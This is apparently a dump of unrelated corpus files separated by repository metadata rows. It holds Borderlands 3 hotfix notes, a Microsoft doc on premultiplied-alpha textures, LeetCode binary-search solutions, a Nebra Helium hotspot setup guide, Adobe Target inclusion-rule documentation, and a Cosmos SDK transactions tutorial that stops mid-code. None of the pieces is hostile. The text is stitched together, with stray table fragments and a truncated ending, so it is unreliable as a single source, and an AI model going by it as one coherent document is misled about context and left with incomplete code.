| Peaking | 8000 Hz | 1.41 | 0.2 dB |
| Peaking | 16000 Hz | 1.41 | 1.1 dB |
### Graphs
 | 38.575 | 98 | 0.551523 | eng_Latn | 0.739338 |
# ds-and-algos-java
Various Java implementations of algorithms for sorting and searching numerous data structures
---
id: tokenCard3
title: A Sustainable Internet, for our planet
image: ./card3.jpeg
button: Start Now
link: '/blog'
order: 3
excerpt:
---
Borderlands 3 Hotfixes: May 20, 2021
Original URL: https://borderlands.com/en-US/news/2021-05-20-borderlands-3-hotfixes-may-20/
Posted: May 20 2021
Today’s changes to Borderlands 3 activate the True Trials event for the Trial of Cunning. During this event, the Trial of Cunning boss has received a HUGE boost to its health and the damage it will be dishing out to players. This mini-event cannot be turned off, so new players beware!
Maurice’s Black Market Vending Machine will be moving to a new location on Thursdays at 9:00 AM PT / 12:00 PM ET and is activated with a hotfix. This week’s gear has a special appearance of a piece of gear from the second Borderlands 3 add-on. As a reminder, players are unable to equip DLC gear if they do not own the DLC it comes from.
These changes will be live on all platforms by 12:00 PM PT. To apply hotfixes, wait at the main menu until you see a sign that reads, “Hotfixes Applied!” If you are experiencing any issues or want to provide feedback, please submit a ticket to support.2k.com.
* Activating the True Trial of Cunning event, which will be active until May 27 at 8:59 AM PT
As a reward, the boss will be dropping two Legendary weapons. Each drop has a chance of being either Sickle or Skullmasher from Gun, Love, and Tentacles add-on (Note: Players who do not own the Guns, Love, and Tentacles add-on will not be able to equip Skullmasher until they own the respective add-on).
In addition, the chest at the end of the Trial of Cunning will be full of Legendaries regardless of how quickly you completed it or how many objectives you scored!
With this hotfix, the Trial of Survival will be returning to its regular state.
---
title: 'How to: Export a texture that has premultiplied alpha'
description: Learn how the Image Content Pipeline generates premultiplied alpha textures from a source image, which can be simpler to use and more robust.
ms.custom: SEO-VS-2020
ms.date: 11/04/2016
ms.topic: how-to
ms.assetid: 05348afa-f079-4f53-a05b-ecd91d13adab
author: TerryGLee
ms.author: tglee
manager: jmartens
ms.technology: vs-ide-designers
ms.workload:
- multiple
ms.openlocfilehash: 7f21aa94786fb9914bd72dfccfa9a59b8469d09f
ms.sourcegitcommit: 68897da7d74c31ae1ebf5d47c7b5ddc9b108265b
ms.translationtype: MT
ms.contentlocale: pl-PL
ms.lasthandoff: 08/13/2021
ms.locfileid: "122073646"
---
# <a name="how-to-export-a-texture-that-has-premultiplied-alpha"></a>How to: Export a texture that has premultiplied alpha
The image content pipeline can generate premultiplied alpha textures from a source image. These can be simpler to use and more robust than textures that do not use premultiplied alpha.
This document demonstrates the following activities:
- Configuring a source image for processing by the image content pipeline.
- Configuring the image content pipeline to generate premultiplied alpha.
## <a name="premultiplied-alpha"></a>Premultiplied alpha
Premultiplied alpha has several advantages over conventional, non-premultiplied alpha because it better represents the real interaction of light with physical materials: it separates the color contribution of a texel (the color it adds to the scene) from its transparency (the amount of the underlying color it lets through). Some of the advantages of using premultiplied alpha are:
- Blending with premultiplied alpha is an associative operation. The result of blending multiple transparent textures is the same regardless of the order in which the textures are blended.
- Because blending with premultiplied alpha is associative, rendering translucent objects in multiple passes is simplified.
- By using premultiplied alpha, you can achieve pure additive blending (by setting the alpha value to zero) and linearly interpolated blending at the same time. For example, in a particle system, an additively blended fire particle can become a transparent smoke particle that is blended by using linear interpolation. Without premultiplied alpha, you would have to draw the fire particles separately from the smoke particles and change the render state between draw calls.
- Textures that use premultiplied alpha compress at higher quality than those that do not, and they do not exhibit the edge discoloration (or "halo effect") that can occur when blending textures that do not use premultiplied alpha.
#### <a name="to-create-a-texture-that-uses-premultiplied-alpha"></a>To create a texture that uses premultiplied alpha
1. Start with a basic texture. Load an existing image file, or create one as described in [How to: Create a basic texture](../designers/how-to-create-a-basic-texture.md).
2. Configure the texture file to be processed by the image content pipeline. In **Solution Explorer**, open the shortcut menu for the texture file, and then choose **Properties**. On the **Configuration Properties** > **General** page, set the **Item Type** property to **Image Content Pipeline**. Make sure that the **Content** property is set to **Yes** and the **Excluded From Build** property is set to **No**, and then choose **Apply**. The **Image Content Pipeline** configuration property page appears.
3. Configure the image content pipeline to generate premultiplied alpha. On the **Image Content Pipeline** > **General** page, set the **Convert to pre-multiplied alpha format** property to **Yes (/generatepremultipliedalpha)**.
4. Choose **OK**.
When you build the project, the image content pipeline converts the source image from its working format to the specified output format, which includes converting the image to premultiplied alpha format, and the result is copied to the project's output directory. | 85.346154 | 591 | 0.821541 | pol_Latn | 0.999964 |
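The associativity and "additive blending via zero alpha" claims above are easy to check numerically. A minimal Python sketch of the Porter-Duff "over" operator on premultiplied RGBA values (illustrative only; real pipelines do this on the GPU):

```python
def over(src, dst):
    """Porter-Duff 'over' for premultiplied RGBA tuples (r, g, b, a)."""
    sa = src[3]
    return tuple(s + (1.0 - sa) * d for s, d in zip(src, dst))

def premultiply(r, g, b, a):
    """Convert straight RGBA to premultiplied RGBA."""
    return (r * a, g * a, b * a, a)

# Additive layer: color is kept as-is with alpha 0, so 'over' just adds it.
fire  = (1.0, 0.5, 0.0, 0.0)
smoke = premultiply(0.2, 0.2, 0.2, 0.6)
glass = premultiply(0.1, 0.3, 0.8, 0.3)

left  = over(over(fire, smoke), glass)   # (fire over smoke) over glass
right = over(fire, over(smoke, glass))   # fire over (smoke over glass)

# Associative: both orders give the same composite (up to float rounding).
assert all(abs(l - r) < 1e-12 for l, r in zip(left, right))

# Zero-alpha source degenerates to pure addition.
assert over(fire, smoke) == tuple(f + s for f, s in zip(fire, smoke))
```

Note that additive results can exceed 1.0 per channel; a renderer would clamp or tone-map at the end.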
9a6621ef23c4211bdc548878c5816b5b5d766157 | 1,369 | md | Markdown | dream/0035.md | hippieZhou/The-Way-Of-LeetCode | c63d777e01413726b6214c616c20c61f8e5b330b | [
"MIT"
] | null | null | null | dream/0035.md | hippieZhou/The-Way-Of-LeetCode | c63d777e01413726b6214c616c20c61f8e5b330b | [
"MIT"
] | null | null | null | dream/0035.md | hippieZhou/The-Way-Of-LeetCode | c63d777e01413726b6214c616c20c61f8e5b330b | [
"MIT"
] | null | null | null | # search-insert-position
```bash
Given a sorted array and a target value, return the index if the target is found in the array. If not, return the index where it would be if it were inserted in order.
You may assume there are no duplicates in the array.
Example 1:
Input: [1,3,5,6], 5
Output: 2
Example 2:
Input: [1,3,5,6], 2
Output: 1
Example 3:
Input: [1,3,5,6], 7
Output: 4
Example 4:
Input: [1,3,5,6], 0
Output: 0
Source: LeetCode
Link: https://leetcode-cn.com/problems/search-insert-position
Copyright belongs to LeetCode (LingKou Network). Contact the official channel for authorization before commercial reprints; cite the source for non-commercial reprints.
```
```C#
public class Solution
{
    // Requires "using System.Linq;" for ToList().
    public int SearchInsert(int[] nums, int target)
    {
        // List<T>.BinarySearch returns the index when the value is found;
        // otherwise it returns the bitwise complement of the insertion index.
        var index = nums.ToList().BinarySearch(target);
        return index >= 0 ? index : -(index + 1);
        // Equivalent: return index >= 0 ? index : ~index;
    }
}
```
```C#
public class Solution
{
public int SearchInsert(int[] nums, int target)
{
var left = 0;
var right = nums.Length - 1;
while (left <= right)
{
var mid = left + (right - left) / 2;
if (nums[mid] == target)
{
return mid;
}
else if (nums[mid] < target)
{
left = mid + 1;
}
else
{
right = mid - 1;
}
}
return left;
}
}
```
```python
class Solution:
def searchInsert(self, nums: list, target: int) -> int:
for i, val in enumerate(nums):
if target <= val:
return i
return len(nums)
``` | 17.779221 | 60 | 0.495982 | eng_Latn | 0.22874 |
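The half-open binary search above can be cross-checked against Python's standard library: `bisect.bisect_left` returns exactly this insertion point for a sorted list without duplicates.

```python
import bisect

def search_insert(nums, target):
    """Return target's index in sorted nums, or its in-order insertion point."""
    lo, hi = 0, len(nums)
    while lo < hi:
        mid = (lo + hi) // 2
        if nums[mid] < target:
            lo = mid + 1
        else:
            hi = mid
    return lo

# Cross-check against the standard library on the problem's examples.
for nums, target, want in [([1, 3, 5, 6], 5, 2), ([1, 3, 5, 6], 2, 1),
                           ([1, 3, 5, 6], 7, 4), ([1, 3, 5, 6], 0, 0)]:
    assert search_insert(nums, target) == want == bisect.bisect_left(nums, target)
```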
9a663256a6dd181d65996a9c048b5a9bbe0378c6 | 3,936 | md | Markdown | docs/indoor-hotspot/quick-start.md | orlandoow/Helium-Guides | 710c9701af83acd7d3c8e746673a5b1fa4aa1b49 | [
"MIT"
] | null | null | null | docs/indoor-hotspot/quick-start.md | orlandoow/Helium-Guides | 710c9701af83acd7d3c8e746673a5b1fa4aa1b49 | [
"MIT"
] | null | null | null | docs/indoor-hotspot/quick-start.md | orlandoow/Helium-Guides | 710c9701af83acd7d3c8e746673a5b1fa4aa1b49 | [
"MIT"
] | null | null | null | # Indoor Hotspot Quick Start Guide
## Box Contents
Your Nebra Indoor Helium Hotspot comes with the following items:
* The Nebra Helium Indoor Hotspot
* RP-SMA LoRa Antenna
* Worldwide 12V 1.5A Power Adapter
* 1M CAT5 Ethernet Cable
## Warnings
Please remember to follow the following steps when using your Nebra Indoor Hotspot.
* Never power on the Indoor Hotspot without its antenna connected, as this may damage the unit.
* Do not place in direct sunlight or on hot surfaces (e.g a Heater).
* The Indoor unit's case is designed to be used indoors, and is not suitable for use outside.
## Preparing Your Nebra Indoor Hotspot
**Step 1:** First screw in the included antenna into the connector on the back of the hotspot.
**Step 2:** Next, find a suitable location for your Hotspot. To provide the best coverage, we recommend placing it near a window, just out of direct sunlight. You'll need to be near a mains power source too.
**Step 3:** If you are using a wired Ethernet connection, connect an Ethernet cable between a router or switch and the Ethernet jack on the Hotspot.
**Step 4:** Fit the appropriate power plug for your country onto the universal power supply and plug it into a mains outlet.
**Step 5:** Finally connect the DC Jack from the power supply into the power receptacle on the Hotspot.
You should then see the lower LED on the back of the unit turn on. The hotspot will now take up to 5 minutes to configure itself on its first boot.
The upper light will turn on when it is ready to continue for configuration.
If you have connected it to a wired Ethernet connection this process may take slightly longer as it’ll also perform firmware updates as soon as it gets a connection to the internet.
## Configuring Your Nebra Indoor Hotspot
To configure your Hotspot, you will need the Helium application installed on a mobile phone, and you must have gone through the account setup process to continue.
**Step 1:** Open the Helium application and login, then press hotspots.
**Step 2:** Next click Set up Hotspot , from here you will want to select Nebra Indoor Hotspot.

**Step 3:** After following the steps on the App to get to this page, Push the button on the back of the unit once to enable pairing and then press scan on the App.

**Step 4:** Press the entry for your hotspot in the app. You can check that it is the correct one by matching the last 6 characters shown in the application with the last 6 characters of the MAC address printed on the sticker on the bottom of the hotspot.
![Choose your hotspot](./nebra_choose.jpg)
**Step 5:** The app will show the available Wi-Fi networks within range of your Hotspot.
![Scanned networks list](./nebra_networks.jpg)
**If you are using Ethernet,** tap Use Ethernet Instead and skip to Step 6.
**If using Wi-Fi,** tap on the name of your Wi-Fi network in the app, which will bring you to the following screen.
![Wi-Fi password](./nebra_wifi.jpg)
Type in your Wi-Fi network's password, then tap Connect, and it should connect to your Wi-Fi network.
**Step 6:** The app will then ask you to set your hotspot's location.
![Hotspot location](./nebra_location.jpg)
**Step 7:** Finally, you can confirm the location of your hotspot. Click continue, and you should be presented with a map on which to place your hotspot in the app.
![Hotspot place](./nebra_place.jpg)
**Step 8:** The setup should now be complete. The app will submit the details of the Hotspot to the Helium network and then, in approximately 15 minutes, confirm it has been added to the network.

| 50.461538 | 250 | 0.757622 | eng_Latn | 0.998005 |
9a6756736dff762753e86441dfafc0e4f35d4620 | 11,705 | md | Markdown | help/c-recommendations/c-algorithms/use-dynamic-and-static-inclusion-rules.md | isabella232/target.en | c95904678086f685614ad17f06001f2c93089a21 | [
"MIT"
] | null | null | null | help/c-recommendations/c-algorithms/use-dynamic-and-static-inclusion-rules.md | isabella232/target.en | c95904678086f685614ad17f06001f2c93089a21 | [
"MIT"
] | 1 | 2021-02-23T13:19:43.000Z | 2021-02-23T16:39:38.000Z | help/c-recommendations/c-algorithms/use-dynamic-and-static-inclusion-rules.md | isabella232/target.en | c95904678086f685614ad17f06001f2c93089a21 | [
"MIT"
] | null | null | null | ---
keywords: inclusion rules;inclusion criteria;recommendations;create new criteria;promotion;promotions;dynamic filtering;dynamic;empty values;ignore filtering rule;static filter;filter by value;entity attribute matching;profile attribute matching;parameter matching;filter by value;static filter
description: Information about creating inclusion rules in Adobe Target Recommendations for criteria and promotions, and adding additional dynamic or static filtering rules to achieve better results.
title: Use dynamic and static inclusion rules in Adobe Target Recommendations
feature: criteria
mini-toc-levels: 3
uuid: f0ee2086-1126-44a4-9379-aa897dc0e06b
---
#  Use dynamic and static inclusion rules{#use-dynamic-and-static-inclusion-rules}
Information about creating inclusion rules for criteria and promotions in Adobe Target, and adding additional dynamic or static filtering rules to achieve better results for your recommendations.
The process for creating and using inclusion rules for criteria and promotions is similar, as are the use cases and examples. Both criteria and promotions and the use of inclusion rules are covered in this topic.
## Adding Filtering Rules to Criteria {#section_CD0D74B8D3BE4A75A78C36CF24A8C57F}
While you are [creating criteria](../../c-recommendations/c-algorithms/create-new-algorithm.md#task_8A9CB465F28D44899F69F38AD27352FE), click **[!UICONTROL Add Filtering Rule]** under **[!UICONTROL Inclusion Rules]**.

The available options vary depending on the selected industry vertical and recommendation key.
## Adding Filtering Rules to Promotions {#section_D59AFB62E2EE423086281CF5D18B1076}
While [creating a promotion](../../c-recommendations/t-create-recs-activity/adding-promotions.md#task_CC5BD28C364742218C1ACAF0D45E0E14), select **[!UICONTROL Promote by Attribute]**, then click **[!UICONTROL Add Filtering Rule]**.

## Filter Types {#section_0125F1ED10A84C0EB45325122460EBCD}
The following table lists the types of filtering options for both criteria and promotions:
### Dynamic Filtering
The following options are available for dynamic filtering:
#### Entity Attribute Matching
Filter dynamically by comparing a pool of potential recommendations items to a specific item that the users has interacted with.
For example, only recommend items that match the current item’s brand.
Available operators:
* equals
* does not equal
* is between
* contains
* does not contain
* starts with
* ends with
* value is present
* value is not present
* is greater than or equal to
* is less than or equal to
#### Profile Attribute Matching
Filter dynamically by comparing items (entities) against a value in the user's profile.
For example, only recommend items that match the visitor’s favorite brand.
Available operators:
* equals
* does not equal
* contains
* does not contain
* starts with
* ends with
* is greater than or equal to
* is less than or equal to
* is between
#### Parameter Matching
Filter dynamically by comparing items (entities) against a value in the request (API or mbox).
For example, only recommend content that matches the "industry" page parameter.
Important: If the activity was created before October 31, 2016, its delivery will fail if it uses the "Parameter Matching" filter. To work around this problem:
* Create a new activity and add your criteria in it.
* Use a criteria that does not contain the "Parameter Matching" filter.
* Remove the "Parameter Matching" filter from your criteria.
Available operators:
* equals
* does not equal
* contains
* does not contain
* starts with
* ends with
* is greater than or equal to
* is less than or equal to
* is between
### Filter by Value
The following option is available for static filtering:
#### Static Filter
Manually enter one or more static values to filter.
For example, only recommend content with an MPAA rating of "G" or "PG."
Available operators:
* equals
* does not equal
* contains
* does not contain
* starts with
* ends with
* value is present
* value is not present
* is greater than or equal to
* is less than or equal to
>[!NOTE]
>
>If you are familiar with how inclusion rules were configured prior to the Target 17.6.1 release (June 2017), you'll notice that some of the options and operators have changed. Only those operators applicable to the selected option display and some operators were renamed ("matches" is now "equals") to be more consistent and intuitive. All existing exclusion rules created prior to this release were automatically migrated into the new structure. No restructuring is necessary on your part.
You can create as many inclusion rules as necessary. The inclusion rules are joined with an AND operator. All rules must be met to include an item in a recommendation.
## Dynamic criteria and promotion examples
Dynamic criteria and promotions are much more powerful than static criteria and promotions, and yield better results and engagement.
The following examples will give you ideas about how you can use dynamic promotions in your marketing efforts:
### Equals
Using the "equals" operator in dynamic promotions, when a visitor is viewing an item on your website (such as a product, article, or movie), you can promote other items from:
* the same brand
* the same category
* the same category AND from the house brand
* the same store
### Does Not Equal
Using the "does not equal" operator in dynamic promotions, when a visitor is viewing an item on your website (such as a product, article, or movie), you can promote other items from:
* a different TV series
* a different genre
* a different product series
* a different style ID
### Is Between
Using the "is between" operator in dynamic promotions, when a visitor is viewing an item on your website (such as a product, article, or movie), you can promote other items that are:
* more expensive
* less expensive
* cost plus or minus 30%
* later episodes in the same season
* prior books in a series
## Handling empty values when filtering by Entity Attribute Matching, Profile Attribute Matching, and Parameter Matching {#section_7D30E04116DB47BEA6FF840A3424A4C8}
You can choose several options to handle empty values when filtering by [!UICONTROL Entity Attribute Matching], [!UICONTROL Profile Attribute Matching], and [!UICONTROL Parameter Matching] for exit criteria and promotions.
Previously, no results were returned if a value was empty. The "If *x* is Empty" drop-down list lets you choose the appropriate action to perform if the criteria has empty values, as shown in the following illustration:

To select the desired action, hover over the gear icon (), then choose the desired action:
| Action | Available For | Details |
|--- |--- |--- |
|Ignore this filtering rule|Profile Attribute Matching<br>Parameter Matching|This is the default action for Profile Attribute Matching and Parameter Matching.<br>This option specifies that the rule is ignored. For example, if there are three filtering rules and the third rule doesn't pass any values, instead of not returning any results, you can simply ignore the third rule with the empty values.|
|Do not promote any items|Entity Attribute Matching<br>Profile Attribute Matching<br>Parameter Matching|This is the default action for Entity Attribute Matching.<br>This action is how [!DNL Target] handled empty values before the addition of this option: no results will be shown for this criteria.|
|Use a static value|Entity Attribute Matching<br>Profile Attribute Matching<br>Parameter Matching|If a value is empty, you can choose to use a static value.|
## Profile Attribute Matching Examples {#section_9873E2F22E094E479569D05AD5BB1D40}
[!UICONTROL Profile Attribute Matching] allows you to recommend only the items that match an attribute from the visitor's profile, as in the examples below.
### Example 1: Recommending items from the user's favorite brand
For example, you can use the [!UICONTROL Profile Attribute Matching] option to create a rule that recommends only items whose brand equals the value or text stored in `profile.favoritebrand`. With such a rule, if a visitor is looking at running shorts from a particular brand, only recommendations that match that user's favorite brand (the value stored in `profile.favoritebrand` in the visitor's profile) will display.
```
Profile Attribute Matching
brand - equals - the value/text stored in - profile.favoritebrand
```
### Example 2: Matching jobs to job seekers
Suppose that you're trying to match jobs to job seekers. You want to recommend only jobs that are in the same city as the job seeker.
You can use inclusion rules to match a job seeker's location from his or her visitor's profile to a job listing, as in the following example:
```
Profile Attribute Matching
jobCity - equals - the value/text stored in - profile.usersCity
```
## Entity Attribute Matching Examples
[!UICONTROL Entity Attribute Matching] allows you to recommend only the items that match an attribute from the item the user is currently viewing, the item the user most recently viewed, the item the user most recently purchased, the item the user most frequently viewed, or from an item stored in a custom attribute in the visitor's profile, as in the examples below.
### Example 3: Upselling to a more expensive product
Suppose that you're an apparel retailer and want to encourage users to consider higher-priced and, therefore, more profitable items. You can use the "equals" and "is between" operators to promote more expensive items that are from the same category and the same brand. For example, a shoe retailer can promote more expensive running shoes in an effort to up-sell a visitor looking at running shoes.
```
Entity Attribute Matching
category - equals - current item's - category
And
Entity Attribute Matching
brand - equals - current item's - brand
And
Entity Attribute Matching
value - is between - 100% and 1000% of - current item's - value
```
### Example 4: Promoting private-label products
You can mix dynamic and static filters to promote private-label products. For example, an office supply company can promote toner cartridges of the company's house brand to drive a more profitable sale for a visitor looking at toner -- and promote pens of the company's house brand to drive a more profitable sale for a visitor looking at pens.
```
Entity Attribute Matching
category - equals - current item's - category
And
Static Filter
IsHouseBrand - equals - true
```
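Conceptually, AND-joined inclusion rules behave like a conjunction of predicates evaluated per candidate item, where "dynamic" rules take their target value from the current item or profile and "static" rules use a fixed value. The sketch below is illustrative only (not Target's implementation), reusing the `IsHouseBrand` attribute from Example 4:

```python
# Map operator names (as shown in the UI) to predicates. Illustrative subset.
OPERATORS = {
    "equals": lambda item_val, target: item_val == target,
    "does not equal": lambda item_val, target: item_val != target,
    "is between": lambda item_val, bounds: bounds[0] <= item_val <= bounds[1],
}

def passes_rules(candidate, context, rules):
    """True only if the candidate satisfies every rule (rules are ANDed)."""
    for attr, op, target in rules:
        # Dynamic rules carry a callable that reads the current item/profile.
        target_value = target(context) if callable(target) else target
        if not OPERATORS[op](candidate.get(attr), target_value):
            return False
    return True

current = {"category": "toner"}          # item the visitor is viewing
rules = [
    ("category", "equals", lambda ctx: ctx["category"]),  # dynamic match
    ("IsHouseBrand", "equals", True),                      # static filter
]
catalog = [
    {"category": "toner", "IsHouseBrand": True},
    {"category": "toner", "IsHouseBrand": False},
    {"category": "pens",  "IsHouseBrand": True},
]
matches = [c for c in catalog if passes_rules(c, current, rules)]
assert matches == [catalog[0]]   # only the house-brand toner survives
```

The same shape extends naturally to the "is between 90% and 110%" price rules by passing computed bounds as the target.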
## Caveats {#section_A889FAF794B7458CA074DEE06DD0E345}
>[!IMPORTANT]
>
>Different data type attributes might not be compatible in dynamic criteria or promotions during runtime with the "equals" and "does not equal" operators. You should use [!UICONTROL Value], [!UICONTROL Margin], [!UICONTROL Inventory], and [!UICONTROL Environment] values wisely on the right hand side if the left hand side has predefined attributes or custom attributes.

The following table shows effective rules and rules that might not be compatible during runtime:
| Compatible Rules | Potentially Incompatible Rules |
|--- |--- |
|value - is between - 90% and 110% of current item's - salesValue|salesValue - is between - 90% and 110% of current item's - value|
|value - is between - 90% and 110% of current item's - value|clearancePrice - is between - 90% and 110% of current item's - margin|
|margin - is between - 90% and 110% of current item's - margin|storeInventory - equals - current item's - inventory|
|inventory - equals - current item's - inventory||
| 46.82 | 491 | 0.783084 | eng_Latn | 0.998662 |
9a689cca608cbda1d40a632e9e13379007a8c82c | 10,313 | md | Markdown | docs/sdk/core/app2.md | fansciecode/sentinel | cc777d57fac091de75bfbe1134c9bba3da765b1c | [
"Apache-2.0"
] | null | null | null | docs/sdk/core/app2.md | fansciecode/sentinel | cc777d57fac091de75bfbe1134c9bba3da765b1c | [
"Apache-2.0"
] | 50 | 2020-09-01T16:46:54.000Z | 2021-04-22T03:19:11.000Z | docs/sdk/core/app2.md | fansciecode/sentinel | cc777d57fac091de75bfbe1134c9bba3da765b1c | [
"Apache-2.0"
] | null | null | null | # Transactions
In the previous app we built a simple bank with one message type `send` for sending
coins and one store for storing accounts.
Here we build `App2`, which expands on `App1` by introducing
- a new message type for issuing new coins
- a new store for coin metadata (like who can issue coins)
- a requirement that transactions include valid signatures
Along the way, we'll be introduced to Amino for encoding and decoding
transactions and to the AnteHandler for processing them.
The complete code can be found in [app2.go](examples/app2.go).
## Message
Let's introduce a new message type for issuing coins:
```go
// MsgIssue to allow a registered issuer
// to issue new coins.
type MsgIssue struct {
Issuer sdk.AccAddress
Receiver sdk.AccAddress
Coin sdk.Coin
}
// Implements Msg.
func (msg MsgIssue) Type() string { return "issue" }
```
Note the `Type()` method returns `"issue"`, so this message is of a different
type and will be executed by a different handler than `MsgSend`. The other
methods for `MsgIssue` are similar to `MsgSend`.
## Handler
We'll need a new handler to support the new message type. It just checks if the
sender of the `MsgIssue` is the correct issuer for the given coin type, as per the information
in the issuer store:
```go
// Handle MsgIssue
func handleMsgIssue(keyIssue *sdk.KVStoreKey, keyAcc *sdk.KVStoreKey) sdk.Handler {
return func(ctx sdk.Context, msg sdk.Msg) sdk.Result {
issueMsg, ok := msg.(MsgIssue)
if !ok {
return sdk.NewError(2, 1, "MsgIssue is malformed").Result()
}
// Retrieve stores
issueStore := ctx.KVStore(keyIssue)
accStore := ctx.KVStore(keyAcc)
// Handle updating coin info
if res := handleIssuer(issueStore, issueMsg.Issuer, issueMsg.Coin); !res.IsOK() {
return res
}
// Issue coins to receiver using previously defined handleTo function
if res := handleTo(accStore, issueMsg.Receiver, []sdk.Coin{issueMsg.Coin}); !res.IsOK() {
return res
}
return sdk.Result{
// Return result with Issue msg tags
Tags: issueMsg.Tags(),
}
}
}
func handleIssuer(store sdk.KVStore, issuer sdk.AccAddress, coin sdk.Coin) sdk.Result {
// the issuer address is stored directly under the coin denomination
denom := []byte(coin.Denom)
infoBytes := store.Get(denom)
if infoBytes == nil {
return sdk.ErrInvalidCoins(fmt.Sprintf("Unknown coin type %s", coin.Denom)).Result()
}
var coinInfo coinInfo
err := json.Unmarshal(infoBytes, &coinInfo)
if err != nil {
return sdk.ErrInternal("Error when deserializing coinInfo").Result()
}
// Msg Issuer is not authorized to issue these coins
if !bytes.Equal(coinInfo.Issuer, issuer) {
return sdk.ErrUnauthorized(fmt.Sprintf("Msg Issuer cannot issue tokens: %s", coin.Denom)).Result()
}
return sdk.Result{}
}
// coinInfo stores meta data about a coin
type coinInfo struct {
Issuer sdk.AccAddress `json:"issuer"`
}
```
Note we've introduced the `coinInfo` type to store the issuer address for each coin.
We JSON serialize this type and store it directly under the denomination in the
issuer store. We could of course add more fields and logic around this,
like including the current supply of coins in existence, and enforcing a maximum supply,
but that's left as an exercise for the reader :).
## Amino
Now that we have two implementations of `Msg`, we won't know before hand
which type is contained in a serialized `Tx`. Ideally, we would use the
`Msg` interface inside our `Tx` implementation, but the JSON decoder can't
decode into interface types. In fact, there's no standard way to unmarshal
into interfaces in Go. This is one of the primary reasons we built
[Amino](https://github.com/tendermint/go-amino) :).
While SDK developers can encode transactions and state objects however they
like, Amino is the recommended format. The goal of Amino is to improve over the latest version of Protocol Buffers,
`proto3`. To that end, Amino is compatible with the subset of `proto3` that
excludes the `oneof` keyword.
While `oneof` provides union types, Amino aims to provide interfaces.
The main difference being that with union types, you have to know all the types
up front. But anyone can implement an interface type whenever and however
they like.
To implement interface types, Amino allows any concrete implementation of an
interface to register a globally unique name that is carried along whenever the
type is serialized. This allows Amino to seamlessly deserialize into interface
types!
The primary use for Amino in the SDK is for messages that implement the
`Msg` interface. By registering each message with a distinct name, they are each
given a distinct Amino prefix, allowing them to be easily distinguished in
transactions.
Amino can also be used for persistent storage of interfaces.
To use Amino, simply create a codec, and then register types:
```go
func NewCodec() *wire.Codec {
cdc := wire.NewCodec()
cdc.RegisterInterface((*sdk.Msg)(nil), nil)
cdc.RegisterConcrete(MsgSend{}, "example/MsgSend", nil)
cdc.RegisterConcrete(MsgIssue{}, "example/MsgIssue", nil)
crypto.RegisterAmino(cdc)
return cdc
}
```
Note: We also register the types in the `tendermint/tendermint/crypto` module so that `crypto.PubKey`
is encoded/decoded correctly.
Amino supports encoding and decoding in both a binary and JSON format.
See the [codec API docs](https://godoc.org/github.com/tendermint/go-amino#Codec) for more details.
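The core idea — carrying a globally registered type name alongside the payload so the decoder can recover the concrete type behind an interface — can be illustrated outside Go. A toy Python version of name-registered decoding (not Amino itself, and not its wire format):

```python
import json

REGISTRY = {}  # registered name -> concrete class

def register(name):
    """Register a concrete class under a globally unique name."""
    def wrap(cls):
        REGISTRY[name] = cls
        cls._type_name = name
        return cls
    return wrap

def marshal(msg):
    # The registered name travels with the serialized value.
    return json.dumps({"type": msg._type_name, "value": msg.__dict__})

def unmarshal(data):
    obj = json.loads(data)
    cls = REGISTRY[obj["type"]]          # concrete type recovered by name
    msg = cls.__new__(cls)
    msg.__dict__.update(obj["value"])
    return msg

@register("example/MsgSend")
class MsgSend:
    def __init__(self, frm, to):
        self.frm, self.to = frm, to

@register("example/MsgIssue")
class MsgIssue:
    def __init__(self, issuer, coin):
        self.issuer, self.coin = issuer, coin

round_tripped = unmarshal(marshal(MsgSend("alice", "bob")))
assert isinstance(round_tripped, MsgSend) and round_tripped.to == "bob"
```

This is why two different `Msg` implementations can share one `Tx` field: the registered prefix disambiguates them at decode time.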
## Tx
Now that we're using Amino, we can embed the `Msg` interface directly in our
`Tx`. We can also add a public key and a signature for authentication.
```go
// Simple tx to wrap the Msg.
type app2Tx struct {
sdk.Msg
PubKey crypto.PubKey
Signature []byte
}
// This tx only has one Msg.
func (tx app2Tx) GetMsgs() []sdk.Msg {
return []sdk.Msg{tx.Msg}
}
// Amino decode app2Tx. Capable of decoding both MsgSend and MsgIssue
func tx2Decoder(cdc *wire.Codec) sdk.TxDecoder {
return func(txBytes []byte) (sdk.Tx, sdk.Error) {
var tx app2Tx
err := cdc.UnmarshalBinary(txBytes, &tx)
if err != nil {
return nil, sdk.ErrTxDecode(err.Error())
}
return tx, nil
}
}
```
## AnteHandler
Now that we have an implementation of `Tx` that includes more than just the Msg,
we need to specify how that extra information is validated and processed. This
is the role of the `AnteHandler`. The word `ante` here denotes "before", as the
`AnteHandler` is run before a `Handler`. While an app can have many Handlers,
one for each set of messages, it can have only a single `AnteHandler` that
corresponds to its single implementation of `Tx`.
The AnteHandler resembles a Handler:
```go
type AnteHandler func(ctx Context, tx Tx) (newCtx Context, result Result, abort bool)
```
Like Handler, AnteHandler takes a Context that restricts its access to stores
according to whatever capability keys it was granted. Instead of a `Msg`,
however, it takes a `Tx`.
Like Handler, AnteHandler returns a `Result` type, but it also returns a new
`Context` and an `abort bool`.
For `App2`, we simply check if the PubKey matches the Address, and the Signature validates with the PubKey:
```go
// Simple anteHandler that ensures msg signers have signed.
// Provides no replay protection.
func antehandler(ctx sdk.Context, tx sdk.Tx) (_ sdk.Context, _ sdk.Result, abort bool) {
appTx, ok := tx.(app2Tx)
if !ok {
// set abort boolean to true so that we don't continue to process failed tx
return ctx, sdk.ErrTxDecode("Tx must be of format app2Tx").Result(), true
}
// expect only one msg and one signer in app2Tx
msg := tx.GetMsgs()[0]
signerAddr := msg.GetSigners()[0]
signBytes := msg.GetSignBytes()
	sig := appTx.Signature
// check that submitted pubkey belongs to required address
if !bytes.Equal(appTx.PubKey.Address(), signerAddr) {
return ctx, sdk.ErrUnauthorized("Provided Pubkey does not match required address").Result(), true
}
// check that signature is over expected signBytes
if !appTx.PubKey.VerifyBytes(signBytes, sig) {
return ctx, sdk.ErrUnauthorized("Signature verification failed").Result(), true
}
// authentication passed, app to continue processing by sending msg to handler
return ctx, sdk.Result{}, false
}
```
## App2
Let's put it all together now to get App2:
```go
func NewApp2(logger log.Logger, db dbm.DB) *bapp.BaseApp {
cdc := NewCodec()
// Create the base application object.
	app := bapp.NewBaseApp(app2Name, logger, db, tx2Decoder(cdc))
// Create a key for accessing the account store.
keyAccount := sdk.NewKVStoreKey("acc")
// Create a key for accessing the issue store.
keyIssue := sdk.NewKVStoreKey("issue")
// set antehandler function
app.SetAnteHandler(antehandler)
// Register message routes.
// Note the handler gets access to the account store.
app.Router().
AddRoute("send", handleMsgSend(keyAccount)).
